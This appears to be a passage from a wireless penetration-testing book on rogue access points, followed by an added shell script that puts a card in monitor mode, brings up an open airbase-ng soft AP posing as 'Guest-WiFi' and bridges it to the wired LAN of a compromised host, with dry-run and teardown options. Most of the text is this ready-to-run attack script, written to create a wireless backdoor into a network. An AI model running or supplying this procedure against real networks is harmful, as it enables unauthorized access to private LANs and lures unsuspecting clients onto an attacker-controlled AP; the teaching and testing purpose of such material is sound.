Rogue access points
So far, we have covered unauthenticated attacks against wireless networks: cracking WEP or WPA keys, attacking WPA-Enterprise, recovering the WPS PIN, and using the recovered credentials to gain access to such networks.
In this section, we cover an attack that starts from the opposite position: the attacker (an insider, or an outsider who has already compromised a host) controls a machine connected to the wired LAN and installs a rogue access point on it.
A rogue AP is an access point installed on a LAN without authorization; an attacker can use it as a wireless backdoor into the network, reachable from outside the building without touching the wired infrastructure again.
A rogue AP can be installed either as a physical device or in software (a soft AP). Installing a physical AP requires violating the network's physical security controls and is easier to spot, so we are going to see how to bring up a rogue soft AP on the compromised machine and bridge it to the wired LAN.
We could accomplish this task with hostapd-wpe (a patched build of hostapd), but here we use a tool from the Aircrack-ng suite, airbase-ng.
First we put our wireless interface into monitor mode with airmon-ng, since airbase-ng injects frames and needs a monitor interface, and then we run the following command...
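The whole procedure (monitor mode, the airbase-ng soft AP, and the bridge to the wired LAN) collected into one script, as an added example that is not the book's own code and goes a step beyond the text by also including the teardown. The interface names (wlan0, wlan0mon, eth0, br0), the SSID and the channel are assumptions chosen for illustration; change them to match the target host.

```shell
#!/bin/sh
# Added example, not from the original text: rogue soft AP with airbase-ng bridged to the wired LAN.
# Assumed (not given by the page): wireless card wlan0 (monitor interface wlan0mon),
# wired card eth0, bridge br0, SSID "Guest-WiFi" on channel 6. Needs root and a real
# adapter; run with DRY_RUN=1 to only print the commands that would be executed.
set -eu

WIFI="${WIFI:-wlan0}"
MON="${MON:-${WIFI}mon}"      # name airmon-ng gives the monitor interface on current releases
WIRED="${WIRED:-eth0}"
BRIDGE="${BRIDGE:-br0}"
SSID="${SSID:-Guest-WiFi}"
CHANNEL="${CHANNEL:-6}"
TAP="at0"                     # tap interface airbase-ng creates for the soft AP

# Execute a command, or just print it when DRY_RUN=1.
run() {
    if [ "${DRY_RUN:-0}" = 1 ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# Step 1: monitor mode. airbase-ng injects frames, so it needs a monitor interface,
# and NetworkManager/wpa_supplicant must not keep reconfiguring the card.
start_monitor() {
    run airmon-ng check kill
    run airmon-ng start "$WIFI"
}

# Step 2: the soft AP. -e sets the SSID, -c the channel. The AP is left open
# (no WEP/WPA options), so any client looking for free Wi-Fi will join it.
start_soft_ap() {
    run sh -c "airbase-ng -e '$SSID' -c $CHANNEL $MON > airbase-ng.log 2>&1 &"
    run sleep 2               # give airbase-ng time to create $TAP
}

# Step 3: bridge the tap interface to the wired LAN so wireless clients land on the LAN.
# The wired card's own address is flushed first; the bridge carries the address instead.
bridge_to_lan() {
    run ip link add name "$BRIDGE" type bridge
    run ip addr flush dev "$WIRED"
    run ip link set "$WIRED" master "$BRIDGE"
    run ip link set "$TAP" master "$BRIDGE"
    run ip link set "$TAP" up
    run ip link set "$BRIDGE" up
    # Optional: let the attacking host itself talk on the LAN through the bridge.
    run dhclient "$BRIDGE"
}

# Undo everything: stop the soft AP, remove the bridge, leave monitor mode.
teardown() {
    run pkill airbase-ng || true
    run ip link set "$BRIDGE" down
    run ip link del "$BRIDGE"
    run airmon-ng stop "$MON"
}

main() {
    start_monitor
    start_soft_ap
    bridge_to_lan
    echo "Rogue AP '$SSID' is up and bridged to $WIRED via $BRIDGE."
}

# Only act when explicitly asked; sourcing the file just defines the functions.
case "${1:-}" in
    --apply)    main ;;
    --teardown) teardown ;;
esac
```

Run it as root with `--apply`, and with `DRY_RUN=1` first to review the command sequence. The bridge is built with iproute2 (`ip link ... master`); on systems that still ship brctl, `brctl addbr br0` and `brctl addif br0 eth0 at0` are the equivalent commands. If large transfers through the bridge stall, lowering the MTU of at0 (for example to 1400) is the usual fix.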